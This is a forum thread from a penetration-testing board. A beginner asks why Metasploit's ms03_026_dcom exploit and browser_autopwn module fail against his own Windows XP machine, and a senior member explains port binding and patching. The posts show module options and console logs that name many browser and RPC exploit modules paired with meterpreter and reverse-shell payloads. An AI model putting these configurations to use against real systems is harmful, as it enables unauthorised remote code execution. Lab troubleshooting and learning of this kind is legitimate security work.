.

problem with metasploit

what is this problem from??

hope it be the AV lol
0
No votes
not the firewall
0
No votes
 
Total votes : 0
<<

zigzago

Newbie
Newbie

Posts: 3

Joined: Thu May 19, 2011 3:19 am

Post Thu May 19, 2011 2:49 pm

problem with metasploit

i have a problem in connecting to my other PC even when i disable my AV & firewall it have XP OS and my other pc opensuse.
1-  i tried 2 connect using dcom with options..
msf exploit(ms03_026_dcom) > show options

Module options (exploit/windows/dcerpc/ms03_026_dcom):

  Name   Current Setting  Required  Description
  ----   ---------------  --------  -----------
  RHOST  192.168.1.125    yes       The target address
  RPORT  135              yes       The target port


Payload options (windows/meterpreter/bind_tcp):

  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
  LPORT     4444             yes       The listen port
  RHOST     192.168.1.125    no        The target address


Exploit target:

  Id  Name
  --  ----
  0   Windows NT SP3-6a/2000/XP/2003 Universal

the result :
msf exploit(ms03_026_dcom) > exploit

   Started bind handler
   Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
   Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.1.125[135] ...
   Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.1.125[135] ...
   Sending exploit ...
   Exploit completed, but no session was created.




2-when i connect with
msf auxiliary(browser_autopwn) > show options

Module options (auxiliary/server/browser_autopwn):

  Name        Current Setting  Required  Description
  ----        ---------------  --------  -----------
  LHOST       192.168.1.161    yes       The IP address to use for reverse-connect payloads
  SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
  SRVPORT     80               yes       The local port to listen on.
  SSL         false            no        Negotiate SSL for incoming connections
  SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
  URIPATH     /                no        The URI to use for this exploit (default is random)


i got :
msf auxiliary(browser_autopwn) > [-] Exploit exception: Permission denied - bind(2)
[-] Failed to start exploit module multi/browser/firefox_escape_retval

   Starting exploit multi/browser/java_calendar_deserialize with payload java/meterpreter/reverse_tcp
   [-] Exploit exception: Permission denied - bind(2)
   [-] Failed to start exploit module multi/browser/java_calendar_deserialize
   Starting exploit multi/browser/java_trusted_chain with payload java/meterpreter/reverse_tcp
   [-] Exploit exception: Permission denied - bind(2)
   [-] Failed to start exploit module multi/browser/java_trusted_chain
   Starting exploit multi/browser/mozilla_compareto with payload generic/shell_reverse_tcp
   [-] Exploit exception: Permission denied - bind(2)
   [-] Failed to start exploit module multi/browser/mozilla_compareto
   Starting exploit multi/browser/mozilla_navigatorjava with payload generic/shell_reverse_tcp
   [-] Exploit exception: Permission denied - bind(2)
   [-] Failed to start exploit module multi/browser/mozilla_navigatorjava
   Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp
   [-] Exploit exception: Permission denied - bind(2)
   [-] Failed to start exploit module multi/browser/opera_configoverwrite
   Starting exploit multi/browser/opera_historysearch with payload generic/shell_reverse_tcp
   [-] Exploit exception: Permission denied - bind(2)
   [-] Failed to start exploit module multi/browser/opera_historysearch
   Starting exploit osx/browser/safari_metadata_archive with payload generic/shell_reverse_tcp
   [-] Exploit exception: Permission denied - bind(2)
   [-] Failed to start exploit module osx/browser/safari_metadata_archive
   Starting exploit windows/browser/apple_quicktime_marshaled_punk with payload windows/meterpreter/reverse_tcp
   [-] Exploit exception: Permission denied - bind(2)
   [-] Failed to start exploit module windows/browser/apple_quicktime_marshaled_punk
   Starting exploit windows/browser/apple_quicktime_rtsp with payload windows/meterpreter/reverse_tcp
   [-] Exploit exception: Permission denied - bind(2)
   [-] Failed to start exploit module windows/browser/apple_quicktime_rtsp
   Starting exploit windows/browser/apple_quicktime_smil_debug with payload windows/meterpreter/reverse_tcp
   [-] Exploit exception: Permission denied - bind(2)
   [-] Failed to start exploit module windows/browser/apple_quicktime_smil_debug
   Starting exploit windows/browser/enjoysapgui_comp_download with payload windows/meterpreter/reverse_tcp
   [-] Exploit exception: Permission denied - bind(2)
   [-] Failed to start exploit module windows/browser/enjoysapgui_comp_download
   Starting exploit windows/browser/ie_createobject with payload windows/meterpreter/reverse_tcp
   [-] Exploit exception: Permission denied - bind(2)
   [-] Failed to start exploit module windows/browser/ie_createobject
   Starting exploit windows/browser/mozilla_interleaved_write with payload windows/meterpreter/reverse_tcp
   [-] Exploit exception: Permission denied - bind(2)
   [-] Failed to start exploit module windows/browser/mozilla_interleaved_write
   Starting exploit windows/browser/ms03_020_ie_objecttype with payload windows/meterpreter/reverse_tcp
   [-] Exploit exception: Permission denied - bind(2)
   [-] Failed to start exploit module windows/browser/ms03_020_ie_objecttype
   Starting exploit windows/browser/ms10_090_ie_css_clip with payload windows/meterpreter/reverse_tcp
   [-] Exploit exception: Permission denied - bind(2)
   [-] Failed to start exploit module windows/browser/ms10_090_ie_css_clip
   Starting exploit windows/browser/ms11_003_ie_css_import with payload windows/meterpreter/reverse_tcp
   [-] Exploit exception: Permission denied - bind(2)
   [-] Failed to start exploit module windows/browser/ms11_003_ie_css_import
   Starting exploit windows/browser/winzip_fileview with payload windows/meterpreter/reverse_tcp
   [-] Exploit exception: Permission denied - bind(2)
   [-] Failed to start exploit module windows/browser/winzip_fileview
   Starting exploit windows/browser/wmi_admintools with payload windows/meterpreter/reverse_tcp
   [-] Exploit exception: Permission denied - bind(2)
   [-] Failed to start exploit module windows/browser/wmi_admintools
   Starting handler for windows/meterpreter/reverse_tcp on port 3333
   Starting handler for generic/shell_reverse_tcp on port 6666
   Started reverse handler on 192.168.1.161:3333
   Starting the payload handler...
   Starting handler for java/meterpreter/reverse_tcp on port 7777
   Started reverse handler on 192.168.1.161:6666
   Starting the payload handler...
   Started reverse handler on 192.168.1.161:7777
   Starting the payload handler...
   --- Done, found 0 exploit modules
   [-] No exploits, check your MATCH and EXCLUDE settings
   Cleaning up exploits...
<<

venom77

User avatar

Hero Member
Hero Member

Posts: 1905

Joined: Mon Dec 11, 2006 3:23 pm

Post Thu May 19, 2011 3:58 pm

Re: problem with metasploit

What system are you running metasploit from? Is your XP system fully patched? Do you already have something running/listening on port 80?
<<

zigzago

Newbie
Newbie

Posts: 3

Joined: Thu May 19, 2011 3:19 am

Post Fri May 20, 2011 6:47 am

Re: problem with metasploit

iam still a beginer i just watched vivek series,iam running metasploit from opensuse11.4
i didn't check on the openports but anyway i think the 1st method with dcom should work if port 80 is not open about xp pached or not wat u mean by pached sry still level 0-1 in hacking and os stuff lol  :D
<<

venom77

User avatar

Hero Member
Hero Member

Posts: 1905

Joined: Mon Dec 11, 2006 3:23 pm

Post Fri May 20, 2011 3:18 pm

Re: problem with metasploit

Oh okay. Well, you need to probably read up on some more stuff first. For one, dcom doesn't have anything to do with port 80. If you have something running on your opensuse box, using port 80, then metasploit can't bind to that port (it's already in use) or you need higher privileges. By 'patched' I mean that an update that fixes the vulnerability has been applied - in which case the exploit won't work.

You should read through the Metasploit Unleashed (among other things) training over at Offensive Security.
<<

zigzago

Newbie
Newbie

Posts: 3

Joined: Thu May 19, 2011 3:19 am

Post Fri May 20, 2011 4:37 pm

Re: problem with metasploit

thank u alot it was really usefull 2 talk 2 u i know it still long way 2 get advanced in this way but i can say its 1st step thank you again.

Return to Network Pen Testing

Who is online

Users browsing this forum: No registered users and 1 guest

.
Powered by phpBB® Forum Software © phpBB Group.
Designed by ST Software